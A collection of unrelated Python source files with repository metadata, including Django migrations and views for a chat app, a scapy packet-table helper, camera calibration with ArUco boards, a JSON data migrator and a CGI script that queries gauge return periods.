545e763fa3b1aba8b83bfdcdc1080165f6a633b3 | f22d31484a12d001826c1775a6f2d245a720fce8 | /Introdução à Programação com Python/Do autor/Códigi fonte e listagem/listagem/capitulo 07/07.01 - Alteração de uma string.py | efae6ebfba495a6cd3c482d6a12c9a1a161a3024 | [] | no_license | eduardoprograma/linguagem_Python | 9eb55f0a5a432a986e047b091eb7ed7152b7da67 | 942aba9146800fc33bbea98778467f837396cb93 | refs/heads/master | 2021-07-07T20:48:37.673101 | 2020-07-31T21:24:17 | 2020-07-31T21:24:17 | 159,852,510 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 889 | py | ##############################################################################
# Part of the book "Introdução à Programação com Python"
# Author: Nilo Ney Coutinho Menezes
# Publisher: Editora Novatec (c) 2010-2017
# First edition - November/2010 - ISBN 978-85-7522-250-8
# First reprint - October/2011
# Second reprint - November/2012
# Third reprint - August/2013
# Second edition - June/2014 - ISBN 978-85-7522-408-3
# First reprint - Second edition - May/2015
# Second reprint - Second edition - January/2016
# Third reprint - Second edition - June/2016
# Fourth reprint - Second edition - March/2017
#
# Site: http://python.nilo.pro.br/
#
# File: listagem\capitulo 07\07.01 - Alteração de uma string.py
##############################################################################
S = "Alô mundo"
print(S[0])
S[0] = "a"
| [
"[email protected]"
] | |
56126378c327efcee4599dc7188b51ad58b63710 | df0a9f3ad6b74269ff72d8ab5737f8351b52ccbf | /Assignments/Week2_3/Python/binary2img.py | ed0848d449a84e679eeb567c7a723b2a9c073645 | [] | no_license | DuongTam1410/IU | bc6794905e9cd95f8d807d8e1d745b882d0ef75c | bdcebda5f3c8516a060a076bea2fa5e7ba5e4d39 | refs/heads/main | 2023-05-04T15:54:31.777517 | 2021-06-01T05:26:21 | 2021-06-01T05:26:21 | 343,701,522 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 980 | py | import numpy as np
import cv2 as cv
def rgb2gray(r, g, b):
    # ITU-R BT.601 luma weights; the /255 scales the result into [0, 1]
    gray = (0.2989*r + 0.5870*g + 0.1140*b) / 255
    return gray
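# e.g. rgb2gray(255, 255, 255) -> ~1.0 (white); rgb2gray(0, 0, 0) -> 0.0 (black)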
image = np.zeros((500, 500, 3), np.uint8)
f1 = open('Dataset/Text/blue8b.txt', 'r')
f2 = open('Dataset/Text/green8b.txt', 'r')
f3 = open('Dataset/Text/red8b.txt', 'r')
f4 = open('Dataset/Text/GrayPython8b.txt', 'w')
pixelsb = []
pixelsg = []
pixelsr = []
# each line holds one pixel value as an 8-bit binary string; int(x, 2) decodes it
for x1 in f1:
pixelsb.append(int(x1,2))
for x2 in f2:
pixelsg.append(int(x2,2))
for x3 in f3:
pixelsr.append(int(x3,2))
k = 0
for i in range(500):
    for j in range(500):
        # rebuild the 500x500 BGR image one pixel at a time
        image[i, j] = (pixelsb[k], pixelsg[k], pixelsr[k])
        # rgb2gray expects (r, g, b), so the red channel goes first; the *255
        # cancels the /255 inside rgb2gray, giving a gray value in 0..255
        f4.write(str(int(rgb2gray(pixelsr[k]*255, pixelsg[k]*255, pixelsb[k]*255)))+'\n')
        k = k + 1
# Write image
#cv.imwrite('vel_moi.jpg', image)
#cv.imshow('Mau',image)
b,g,r = cv.split(image)
img_gray = rgb2gray(r, g, b)
cv.imshow('Gray',img_gray)
cv.waitKey()
cv.destroyAllWindows()
f1.close()
f2.close()
f3.close()
f4.close() | [
"[email protected]"
] | |
354308ea2dc9307ff4130f508e8b3b3c44281109 | 3597488b9cb22c6e23528b889f5581f0050b4a7c | /tableService.py | 1fa0c01a01a8e40203c6133daed6d483104c2af8 | [] | no_license | shawzh/snipa | 2e517066756f457092b5aeeea7e57780f24c4b9d | 58de9bdece3510360038420e66066f1bb72b2a16 | refs/heads/master | 2021-01-02T23:09:19.521174 | 2017-09-19T15:04:32 | 2017-09-19T15:04:32 | 99,476,413 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,833 | py | import datetime
from PyQt5.QtWidgets import QTableWidgetItem
class TableService():
def __init__(self, pcaps, model):
self.pcaps = pcaps
self.model = model
def insertDataToTable(self):
preRow = self.model.rowCount()
        self.model.setRowCount(preRow + len(self.pcaps.res))
        # convert each parsed packet row into table cells
for row in self.build():
for n, key in enumerate(row):
item = QTableWidgetItem(str(key))
self.model.setItem(preRow, n, item)
preRow = preRow+1
def build(self):
rows = []
for p in self.pcaps:
            # only one protocol layer of fields is extracted per packet
time = datetime.datetime.fromtimestamp(p.time).strftime("%Y-%m-%d %H:%M:%S")
src = self.getSrc(p)
dst = self.getDst(p)
raw = self.getRaw(p)
length = len(p.original)
proto = self.getProto(p)
row = [time, src, dst, proto, length, raw]
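            # 239.255.255.250 is the SSDP multicast address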
if row[2] == '239.255.255.250':
row[3] = 'SSDP'
rows.append(row)
return rows
def getSrc(self, p):
try:
return p['IP'].src
except:
try:
return p['ARP'].psrc
except:
return 'miss src'
def getDst(self, p):
try:
return p['IP'].dst
except:
try:
return p['ARP'].pdst
except:
return 'miss dst'
def getRaw(self, p):
try:
return p.summary()
except:
return 'miss'
def getProto(self, p):
try:
t = p['TCP']
return 'TCP'
except:
try:
t = p['UDP']
return 'UDP'
except:
return 'ARP'
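
# --- Usage sketch (not part of the original module; names are illustrative) ---
# `packets` would come from a scapy capture (a PacketList exposes .res) and
# `table` would be a QTableWidget already set up with six columns.
#
#   from scapy.all import sniff
#   packets = sniff(count=20)
#   service = TableService(packets, table)
#   service.insertDataToTable()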
| [
"[email protected]"
] | |
ca8aab44108b0780f2a4d6b4c46508d630f53073 | 9dab41a71bf19a9ad17ee3e9f77c0f58aebd1d6d | /python/uline/uline/uline/temp/__init__.py | 37069a7e2112b786ada292780a87c95a4cfef7d0 | [] | no_license | apollowesley/Demo | f0ef8ec6c4ceb0aec76771da8dd9a62fb579eac8 | 471c4af95d3a7222d6933afc571a8e52e8fe4aee | refs/heads/master | 2021-02-15T04:01:51.590697 | 2018-01-29T01:44:29 | 2018-01-29T01:44:29 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 83 | py | #!/usr/bin/env python
#-*- coding: utf-8 -*-
# Author: Ficapy
# Create: '10/10/16'
| [
"[email protected]"
] | |
c7b686029c847611bca34a3e5eda778e122773d4 | 175075b2e11002808d5948c11620dca702db480b | /HackerRank-Security Encryption Scheme.py | 608925e575da347cda2002c44b940443182b96d2 | [] | no_license | Jeffreyhung/hackerrank | df6790c2062cdca246e5dc1274e250d229b8186a | 1d0b572762466de36226a0341ffa56cd2aea2759 | refs/heads/master | 2020-04-16T16:18:20.408779 | 2019-04-01T19:18:18 | 2019-04-01T19:18:18 | 165,731,174 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 71 | py | x = input()
num=1
for i in range (1, x+1):
num =num* i
print num
| [
"[email protected]"
] | |
1998c9f8bbb023c8ba8846597860434a9280153a | 497f9429c56d85e69e97c35b3305a241957bc42a | /qblog/blog/migrations/0001_initial.py | 1281e20e3b9d696763e8dc42dc175369b3c39bf5 | [] | no_license | chaman1avnish/Github_api | d1a6356c124d0309d48b2b174ecae2c0fe913d4e | 90cf4156dcdbcf4b358577e2cebb0b54f48404c8 | refs/heads/master | 2021-05-16T06:49:37.795155 | 2017-09-14T07:58:26 | 2017-09-14T07:58:26 | 103,503,208 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,051 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.10.6 on 2017-09-09 13:13
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Entry',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('title', models.CharField(max_length=200)),
('body', models.TextField()),
('slug', models.SlugField(max_length=200, unique=True)),
('publish', models.BooleanField(default=True)),
('created', models.DateTimeField(auto_now_add=True)),
('modified', models.DateTimeField(auto_now=True)),
],
options={
'verbose_name_plural': 'Blog Entries',
'verbose_name': 'Blog Entry',
'ordering': ['-created'],
},
),
]
| [
"[email protected]"
] | |
8e5348f8a6abddead38abba9b00f18d658729f14 | 3e3de2655e7e4602b5309bc563db960134ce79a6 | /tempandhumiditythread.py | b4e902fae445238caddd2549b37aca7b2217cefc | [] | no_license | NahidMondol/GardenAutomation | bf95e81cd1fc75ab015438c301f4478dbd12cc21 | 040cbaa1e5a364525cb8e868a0e3c59ec090325f | refs/heads/master | 2023-07-11T11:59:21.386008 | 2021-08-13T23:58:47 | 2021-08-13T23:58:47 | 389,012,333 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 990 | py | import threading
import time
import sys
from tempandhumidity import TemperatureAndHumidity
class TemperatureAndHumidityThread(threading.Thread):
    stop = False            # set True (via closeThread) to end the polling loop
    sensor = None
    currentTemp = None      # latest readings, refreshed once per second in run()
    currentHumidity = None
def __init__(self, threadID):
threading.Thread.__init__(self)
self.sensor = TemperatureAndHumidity()
self.threadID = threadID
def run(self):
"""Obtain the temperature and humidity from the sht40
until the thread is stopped
"""
print("Starting TempAndHumidity Thread")
while not self.stop:
self.currentTemp = self.sensor.getTemperature()
self.currentHumidity = self.sensor.getHumidity()
print(self.currentTemp)
print(self.currentHumidity)
time.sleep(1)
def closeThread(self):
"""Call this method to close the thread"""
self.stop = True
#threadOne = TemperatureAndHumidityThread(1)
#threadOne.start()
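#threadOne.closeThread()  # illustrative: sets `stop` so run() exits its loop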
| [
"[email protected]"
] | |
4aa25c84448889944cb2c2a57f1b36a06161a03c | 4433c8f98a6dfed4a6ae55bcb3f875f103417271 | /lib/migrations/backends/jsonfile.py | 667db7a920b8b1e3dd9581697f904cadf3f52f1a | [] | no_license | fpliger/migrations | 97dd6daf30c198630af59c3125c7df9a35cb43dd | e52ff01778c8e24de5b1724fb93e7fe02898b06b | refs/heads/master | 2016-09-06T06:03:07.694523 | 2014-01-21T09:08:57 | 2014-01-21T09:08:57 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 11,707 | py | import os
import json
import csv, codecs, cStringIO
from sqlalchemy import types
import sqlalchemy as sa
from .base import MigratorBase
class Migrator(MigratorBase):
"""
Represent data migration from/to one or more CSV files
"""
# CSV custom options:
default_options = dict(MigratorBase.default_options)
# csv default limiter
default_options["csv_delimiter"] = ";"
# csv default file encoding
default_options["encoding"] = "utf-8"
#def initialize(self):
#MigratorBase.__init__(self, path, log_cb = None, **options)
def initialize(self):
"""
Initializes instance database engine and database cached data
"""
self.done = set()
if os.path.isdir(self.path):
self.path_dir = self.path
else:
self.path_dir = os.path.dirname(os.path.abspath(self.path))
def _migrate(self, destination, tables=None, paquet=10000, exclude=None):
        if tables is None:
            # No tables specified, so as we are migrating information inside
            # json files we consider every *.json file in self.path_dir
            # to be a "table".
            tables = [filename.replace(".json", "") for filename in
                      search_files(".json", self.path_dir, False)]
for table_name in tables:
self.log_cb("\n\nmigrating %s" % table_name)
records = []
table = None
try:
with open(os.path.join(self.path_dir, '%s.json'%table_name),'rb') as fin:
records = json.load(fin)#, default=json_handler)
if records:
columns = records[0].keys()
table = CSVTable(table_name, columns)
#reader = UnicodeReader(fin,
# delimiter=self.options["csv_delimiter"],
# encoding=self.options["encoding"])
#
#self.log_cb('Transferring records')
#for i, row in enumerate(reader):
# print i, row
# if i == 0:
# columns = row
#
# print "COLUMS", columns, table
# else:
# record = dict(zip(columns, row))
# records.append(record)
#
# # Let's check if the records are ready to be dumped (as we
# # don't want it to be bigger to the paquet size set
# if len(records) >= paquet:
# destination.dump(records, table)
# records = []
                # Finally we have finished looping all the records and just
                # need to dump those left in records
destination.dump(records, table)
                else:
                    self.log_cb("no records found in %s" % table_name)
except Exception, e:
#err_msg = u"""Error dumping table [%s] on destination. \
#Error details: %s"""%(table.name, e.message)
##self.exceptions.append(err_msg)
#self.log_cb(err_msg)
raise
def _dump(self, records, table):
"""
Dumps all the records into the file named <table.name>.csv into the
self.path_dir folder. If the the file does not exist a new one will be
created.
see .base.MigratorBase.dump for further details
"""
# get the csv file path
filepath = os.path.join(self.path_dir, "%s.json"%table.name)
transfer_mode = self.options.get(
"transfer_mode", self.default_options.get("transfer_mode")
)
print "DUMPING", table, records
tab_stats = self.get_table_stats(table.name)
if table.name in self.done:
mode = "a"
else:
self.done.add(table.name)
mode = "w"
records = [dict(r) for r in records]
# open the file
with open(filepath, mode) as jsonfile:
## define a csvfile writer that supports unicode
#writer = UnicodeWriter(csvfile,
# delimiter=self.options["csv_delimiter"],
# encoding=self.options["encoding"])
#
## if it's the first dump called into this table we want to write
## also the column names on the first wor of the file
#if not table.name in self.stats["tables"]:
# colnames = [col.name for col in table.columns]
# writer.writerow(colnames)
print "DUMPING....", records
#json_content = json.dumps(records, default=json_handler)
json.dump(records, jsonfile, default=json_handler)
#jsonfile.write(json_content)
#jsonfile.close()
#for paquet in records:
# row = [value_factory(paquet[colname]) for colname in colnames]
# writer.writerow(row)
tab_stats = self.update_dump_stats(tab_stats, records, transfer_mode)
print "DONE"
#import pdb
#pdb.set_trace()
self.log_cb("table dump finished")
raw_input("done")
def json_handler(obj):
if hasattr(obj, 'isoformat'):
return obj.isoformat()
#elif isinstance(obj, ...):
# return ...
else:
raise TypeError, 'Object of type %s with value of %s is not JSON serializable' % (type(obj), repr(obj))
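
# Illustrative example of the hook in use:
#   json.dumps({'ts': datetime.datetime(2014, 1, 1)}, default=json_handler)
#   -> '{"ts": "2014-01-01T00:00:00"}'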
class CSVTable(object):
"""
Represent a CSV file as 'table' object with some of the SQAlchemy table
object attributes that are shared as a common interface for all the Migrator
objects having to deal with table objects with their dump/migrate methods
"""
def __init__(self, name, columns, ):
self.name = name
self.columns = [CSVColumn(col) for col in columns]
def exists(self, engine):
"""
Simulates a SQLAlchemy Table.exists method. Receives a SQLAlchemy db
        engine and checks if the database already has a table named after the
        file bound to the class instance
"""
return self.name in engine.table_names()
@property
def c(self):
"""
Simulates the SQLAlchemy table c property. Returns the table columns
collection
"""
return self.columns
@property
def primary_key(self):
"""
        Simulates the SQLAlchemy table primary_key property. These file-backed
        'tables' have no primary key, so None is returned
"""
return None
def create(self, engine):
"""
Simulates a SQLAlchemy create method. Receives a SQLAlchemy db
engine and checks if the database already have a table named as the
CSV filename binded to the class instance
"""
columns = [sa.Column(col.name, sa.Unicode) for col in self.columns]
metadata = sa.MetaData()
table_object = sa.Table(self.name,
metadata,
*columns)
metadata.create_all(engine)
class CSVColumn(object):
"""
Represent a CSV 'table' 'column' object with some of the SQAlchemy table
column object attributes that are shared as a common interface for all the
Migrator objects having to deal with table objects with their dump/migrate
methods
"""
def __init__(self, name, type_ = None):
if type_ is None:
type_ = types.NullType()
self.name = name
self.type = type_
###############################################
# From the CSV documentation on how to handle with UNICODE strings
# see http://docs.python.org/2/library/csv.html
###############################################
class UTF8Recoder:
"""
Iterator that reads an encoded stream and reencodes the input to UTF-8
"""
def __init__(self, f, encoding):
self.reader = codecs.getreader(encoding)(f)
def __iter__(self):
return self
def next(self):
return self.reader.next().encode("utf-8")
class UnicodeReader:
"""
A CSV reader which will iterate over lines in the CSV file "f",
which is encoded in the given encoding.
"""
def __init__(self, f, dialect=csv.excel, encoding="utf-8", **kwds):
f = UTF8Recoder(f, encoding)
self.reader = csv.reader(f, dialect=dialect, **kwds)
def next(self):
row = self.reader.next()
return [unicode(s, "utf-8") for s in row]
def __iter__(self):
return self
class UnicodeWriter:
"""
A CSV writer which will write rows to CSV file "f",
which is encoded in the given encoding.
"""
def __init__(self, f, dialect=csv.excel, encoding="utf-8", **kwds):
# Redirect output to a queue
self.queue = cStringIO.StringIO()
self.writer = csv.writer(self.queue, dialect=dialect, **kwds)
self.stream = f
self.encoder = codecs.getincrementalencoder(encoding)()
def writerow(self, row):
self.writer.writerow([s.encode("utf-8") for s in row])
# Fetch UTF-8 output from the queue ...
data = self.queue.getvalue()
data = data.decode("utf-8")
# ... and reencode it into the target encoding
data = self.encoder.encode(data)
# write to the target stream
self.stream.write(data)
# empty queue
self.queue.truncate(0)
def writerows(self, rows):
for row in rows:
self.writerow(row)
##############################
# END OF Unicode Handlers definitions from the Python Docs
##############################
def value_factory(val):
"""
    simple function that handles datatypes not supported by csv and
    converts them to str
"""
if val is None:
return ""
elif isinstance(val, basestring):
return val
else:
return str(val)
def search_files( file_ext, path = None, recursive=True ):
""" Search for files matching the regex pattern
INPUTS:
pattern ::: regex string defining a pattern that must be matched
path ::: path of the folder where to search the files
recursive ::: if True searches recursively also into the path subfolders
OUTPUT:
Returns a list of the file paths inside path that matches the regex pattern
>> search_files(["*.csv"], "/")
["export.csv", "test.csv"]
"""
# If no path is specified we take the current folder
path = path or os.getcwd()
    output = []
    # Loop over all path children
    for item in os.listdir(path):
        item_path = os.path.join(path, item)
        if os.path.isfile(item_path):
            # if it's a file...
            if item.endswith(file_ext):
                # ... and it matches the extension, keep it
                output.append(item)
        elif recursive:
            # It's not a file, so search the subfolder for matches
            output += search_files(file_ext, item_path, recursive)
    return output
| [
"[email protected]"
] | |
9f1bf0ee8d6eef2d2c7b659a2f06835f5caa48f8 | 49f1c9002acb01350cf568c42b34cceae886914c | /api/migrations/0001_initial.py | 35ef512fa966d27e9ac5fbab94aca94bb48a4add | [] | no_license | sonal-spd/Blog-API | 30155a0d1ccfc55be00cd86083c680f4717bc9dd | 83cc214accf0b98b7174a705411171ef68bfae84 | refs/heads/main | 2023-05-08T07:14:44.283158 | 2021-05-28T15:02:51 | 2021-05-28T15:02:51 | 370,421,086 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 998 | py | # Generated by Django 3.1 on 2021-05-24 10:07
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='Post',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created', models.DateTimeField(auto_now_add=True)),
('title', models.CharField(blank=True, default='', max_length=100)),
('body', models.TextField(blank=True, default='')),
('owner', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='posts', to=settings.AUTH_USER_MODEL)),
],
options={
'ordering': ['created'],
},
),
]
| [
"[email protected]"
] | |
71ea887c40aaf00fe772c368c29f19ea855a76d6 | 451e3188ef94bfd106a0194774c23edd0bba84a2 | /blog/migrations/0015_auto_20190821_1316.py | 703a6cc74f7e2027ad19de428eeb711a4c99d573 | [] | no_license | Dolidodzik/Wagtail-Django-Static-Blog | fe9c8caf63275c8f444ac7b898e7e0d67fae018a | db0769da8c7b1c3fc450fe40181bfcf984079ec1 | refs/heads/master | 2020-06-08T02:13:32.401772 | 2019-10-29T17:09:09 | 2019-10-29T17:09:09 | 193,139,774 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 644 | py | # Generated by Django 2.2.3 on 2019-08-21 13:16
from django.db import migrations
import wagtail.core.blocks
import wagtail.core.fields
import wagtail.images.blocks
class Migration(migrations.Migration):
dependencies = [
('blog', '0014_delete_blogpagecomments'),
]
operations = [
migrations.AlterField(
model_name='blogindexpage',
name='body',
field=wagtail.core.fields.StreamField([('heading', wagtail.core.blocks.CharBlock(classname='full title')), ('paragraph', wagtail.core.blocks.RichTextBlock()), ('image', wagtail.images.blocks.ImageChooserBlock())]),
),
]
| [
"[email protected]"
] | |
75171274ba8ba3b055ada05dd765ef6e1bfaf123 | 2e39bddca6f33832bfc8d08462b8343b6671f542 | /Django/Otros/TiendaOnline/gestionPedidos/migrations/0001_initial.py | a87a69a7ccedb25ecef638c63db9248ff8db7be6 | [] | no_license | NikorasuOwO/Cursos | be7713eec27646cf0f869979b0837dfc9c8757a1 | efa44ed4990419f34f5bb3fc3507877d3b43a4de | refs/heads/master | 2023-07-12T01:52:18.090181 | 2021-08-15T23:55:42 | 2021-08-15T23:55:42 | 336,520,775 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,325 | py | # Generated by Django 3.1.7 on 2021-02-26 20:40
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Articulos',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('nombre', models.IntegerField()),
],
),
migrations.CreateModel(
name='Cliente',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('nombre', models.CharField(max_length=30)),
('direccion', models.CharField(max_length=50)),
('email', models.EmailField(max_length=254)),
('tfno', models.CharField(max_length=7)),
],
),
migrations.CreateModel(
name='Pedidos',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('numero', models.IntegerField()),
('fecha', models.DateTimeField()),
('entregado', models.BooleanField()),
],
),
]
| [
"[email protected]"
] | |
fb56e91a66488a740c9644e3a740f403308520da | 181b48345df78b989dc6d52fdbebf5b62f753fed | /chat/views.py | 52807454ddc3f533edf97acc461a89e8a282ca88 | [] | no_license | abhinavdhere/chat_app | a60f8809b5ae0eaa5a674464f1a15fef75b4854f | d437e13e4c836020efc75e6451434c8c2df969d0 | refs/heads/master | 2021-01-20T15:18:01.623181 | 2017-05-09T20:57:39 | 2017-05-09T20:57:39 | 90,745,744 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,894 | py | from django.shortcuts import render,get_object_or_404,redirect
from django.utils import timezone
from .models import message
#from .forms import PostForm
from .forms import MyRegistrationForm, MessageForm
from django.template.context_processors import csrf
from django.contrib import auth
from django.http import HttpResponseRedirect
from itertools import chain
from django.urls import reverse
def index(request):
if not request.user.is_authenticated():
return render(request,'chat/index.html')
else:
return HttpResponseRedirect('/home/')
def home(request):
if not request.user.is_authenticated():
return HttpResponseRedirect('/login')
else:
users = auth.models.User.objects.all()
return render(request, 'chat/home.html' , {'user_obj':request.user,'users':users})
def login(request):
c = {}
c.update(csrf(request))
return render(request,'chat/login.html',c)
def auth_view(request):
username = request.POST.get('username','')
password = request.POST.get('password','')
user = auth.authenticate(username=username,password=password)
if user is not None:
auth.login(request,user)
return HttpResponseRedirect('/home')
else:
return HttpResponseRedirect('/invalid')
def invalid_login(request):
return render(request, 'chat/invalid_login.html')
def logout(request):
auth.logout(request)
return render(request, 'chat/logout.html')
def register_user(request):
if request.method == 'POST':
form = MyRegistrationForm(request.POST)
print ("got form")
if form.is_valid():
form.save()
return HttpResponseRedirect('/register_success')
else:
print (form.errors)
args = {}
args.update(csrf(request))
args['form']=MyRegistrationForm()
print (args)
return render(request,'chat/register.html',args)
def register_success(request):
return render(request,'chat/register_success.html')
def chat_window(request,pk):
receiver = get_object_or_404(auth.models.User, pk=pk)
    # collect messages received from and sent to the selected user,
    # then merge them in chronological order
    messages_r = message.objects.filter(recipient__id=request.user.pk, author__id=pk)
    messages_s = message.objects.filter(author__id=request.user.pk, recipient__id=pk)
    messages_all = sorted(chain(messages_r, messages_s), key=lambda message: message.timestamp)
if request.method == "POST":
form = MessageForm(request.POST)
if form.is_valid():
messageToSend = form.save(commit=False)
messageToSend.author = request.user
messageToSend.recipient = receiver
messageToSend.timestamp = timezone.now()
messageToSend.save()
return HttpResponseRedirect("/chat_window/"+str(pk))
else:
form = MessageForm()
return render(request,'chat/chat_window.html',{'receiver':receiver,'messages_all':messages_all,'form':form}) | [
"[email protected]"
] | |
5314b1e043f0d4569af3631cca0f45807e1aa1b0 | 7f958999988d324d9dad9d09cc9b7a180407ad3c | /calibration/camera_calibration.py | a317fffc0f27b97db0b4e88d5072b760f1077746 | [] | no_license | nozomikobori/ece4078group_project | bfafc9c736c0ffa59a9c1b7a522b119e64098188 | 629c2fb1a530c8d498f424843733dfc099732489 | refs/heads/main | 2023-01-09T19:16:29.888732 | 2020-11-07T11:37:32 | 2020-11-07T11:37:32 | 310,830,718 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 3,998 | py | import numpy as np
import cv2
from cv2 import aruco
import matplotlib.pyplot as plt
import os
import sys
import penguinPiC
ppi = penguinPiC.PenguinPi()
def camera_calibration(dataDir):
# This file can be used to generate camera calibration parameters
# to improve the default values
fileNameK = "{}intrinsic.txt".format(dataDir)
fileNameD = "{}distCoeffs.txt".format(dataDir)
aruco_dict = aruco.Dictionary_get(aruco.DICT_4X4_100)
    # 3x3 ChArUco board: square size 0.94, marker size 0.34 (same length units)
    board = aruco.CharucoBoard_create(3, 3, 0.94, 0.34, aruco_dict)
allCorners = []
allIds = []
decimator = 0
images = np.array([dataDir + f for f in os.listdir(dataDir) if f.endswith(".png")])
criteria = (cv2.TERM_CRITERIA_EPS + cv2.TERM_CRITERIA_MAX_ITER, 100, 0.00001)
for im in images:
print("=> Processing image {0}".format(im))
frame = cv2.imread(im)
gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
corners, ids, rejectedImgPoints = cv2.aruco.detectMarkers(gray, aruco_dict)
if len(corners) > 0:
# SUB PIXEL DETECTION
for corner in corners:
cv2.cornerSubPix(gray, corner,
winSize=(3, 3),
zeroZone=(-1, -1),
criteria=criteria)
res2 = cv2.aruco.interpolateCornersCharuco(corners, ids, gray, board)
if res2[1] is not None and res2[2] is not None and len(res2[1]) > 3 and decimator % 1 == 0:
allCorners.append(res2[1])
allIds.append(res2[2])
print("Image: {}/{}".format(decimator + 1, len(images)))
print("Corners found: {}".format(len(corners)))
decimator += 1
imsize = gray.shape
print("\n")
print("Checkerboard detected in: {}/{} images".format(len(allCorners), decimator))
cameraMatrixInit = np.array([[1000., 0., imsize[0] / 2.],
[0., 1000., imsize[1] / 2.],
[0., 0., 1.]])
distCoeffsInit = np.zeros((5, 1))
flags = (cv2.CALIB_USE_INTRINSIC_GUESS + cv2.CALIB_RATIONAL_MODEL + cv2.CALIB_FIX_ASPECT_RATIO)
(ret, camera_matrix, distortion_coefficients0,
rotation_vectors, translation_vectors, _, _, _) = cv2.aruco.calibrateCameraCharucoExtended(
charucoCorners=allCorners,
charucoIds=allIds,
board=board,
imageSize=imsize,
cameraMatrix=cameraMatrixInit,
distCoeffs=distCoeffsInit,
flags=flags,
criteria=(cv2.TERM_CRITERIA_EPS & cv2.TERM_CRITERIA_COUNT, 10000, 1e-9))
np.savetxt(fileNameK, camera_matrix, delimiter=',')
np.savetxt(fileNameD, distortion_coefficients0, delimiter=',')
i = 5 # select image id
plt.figure()
frame = cv2.imread(images[i])
img_undist = cv2.undistort(frame, camera_matrix, distortion_coefficients0, None)
plt.subplot(1, 2, 1)
plt.imshow(frame)
plt.title("Raw image")
plt.axis("off")
plt.subplot(1, 2, 2)
plt.imshow(img_undist)
plt.title("Corrected image")
plt.axis("off")
plt.show()
def image_collection(dataDir, images_to_collect):
for i in range(images_to_collect):
input(i)
image = ppi.get_image()
filename = "{}{}.png".format(dataDir, i)
cv2.imwrite(filename, image)
if __name__ == "__main__":
currentDir = os.getcwd()
dataDir = "{}/camera_calibration/".format(currentDir)
if not os.path.exists(dataDir):
os.makedirs(dataDir)
images_to_collect = 20
# collect data
print('Collecting {} images for camera calibration.'.format(images_to_collect))
print('Press ENTER to capture image.')
image_collection(dataDir, images_to_collect)
print('Finished image collection.\n')
# calibrate camera
print('Calibrating camera...')
camera_calibration(dataDir)
print('Finished camera calibration.')
| [
"[email protected]"
] | |
a59a26961da45950666c07f9b6d5376b456082a1 | 441a84571670913ce168a895eaed94a0b208f916 | /cgi-bin/rp_current.py | f2ea06de4b27bb81d55e4435f3a0cb532cb88ff7 | [] | no_license | sluedtke/cedim | ad88467be660a4f2af4217200729da12e626da0e | 1d31dc472a9ce5f8da5be875cd3598ad245bec87 | refs/heads/master | 2016-09-10T15:37:15.046093 | 2015-08-03T15:17:48 | 2015-08-03T15:17:48 | 23,461,327 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,204 | py | #!/usr/bin/python
######################################################################
# Author: Kai Schroeter
# Created: Tuesday 26 August 2014
# Last modified: Tuesday 02 September 2014 21:41:41 CEST
############################# PURPOSE ######################
#
# evaluate online gauge data with regard to return period
######################################################################
import json
import psycopg2
import psycopg2.extras
import cgi
import sys, os
from datetime import date, timedelta
import string
import cgitb; cgitb.enable() # for troubleshooting
form=cgi.FieldStorage()
# Get data from fields
start=form['start_date'].value
end=form['end_date'].value
rp_array=form['rp_array'].value
rp_array=json.loads(rp_array)
def connect(db_name, user, pwd, host):
try:
conn = psycopg2.connect(database=db_name, user=user, host = host, password=pwd)
except (KeyError, TypeError), e:
#print "database connection failed"
print "Fehler:", e
return conn
def settings_vm27_guest():
db_name = "cedim_rfra"
nutzer = "guest"
pwd = "guest"
host = "139.17.99.27"
return db_name, nutzer, pwd, host
def read_sql(sql_fn):
fn = open(sql_fn, 'r')
sql = " ".join(fn.readlines())
return(sql)
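# e.g. read_sql('../sql_files/rp_current.sql') returns the template file's
# lines joined into a single SQL string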
params=[start, end]
params=params+rp_array
def classify_qmax(target_list, params):
SQL=read_sql('../sql_files/rp_current.sql')
    # expand the XXXX marker in the SQL template into one %s per return period
    placeholder = '%s'
placeholders= ', '.join(placeholder for unused in rp_array)
SQL=string.replace(SQL, 'XXXX', placeholders)
#data base connection and creation of cursor
db_name, user, pwd, host = settings_vm27_guest()
conn = connect(db_name, user, pwd, host)
cur = conn.cursor(cursor_factory=psycopg2.extras.DictCursor)
SQL=cur.mogrify(SQL, params)
cur.execute(SQL)
rps_all = cur.fetchall()
for rps in rps_all:
attr = {'number': rps['gauges'], 'qmax':rps['q_max'],
'rp_class':rps['rp_class'],
'geom': json.loads(rps['geom'])}
target_list.append(attr)
return target_list
#######################################################################
def create_featuresCollection(query):
features=[]
for query_row in query:
# geom=json.loads(query_row['geom'])
geom=query_row['geom']
col_list=query_row.keys()
# get rid of the geom column
col_list=[elem for elem in col_list if elem != "geom"]
# init an empty dictionary to store the theme attributes /properties
props={}
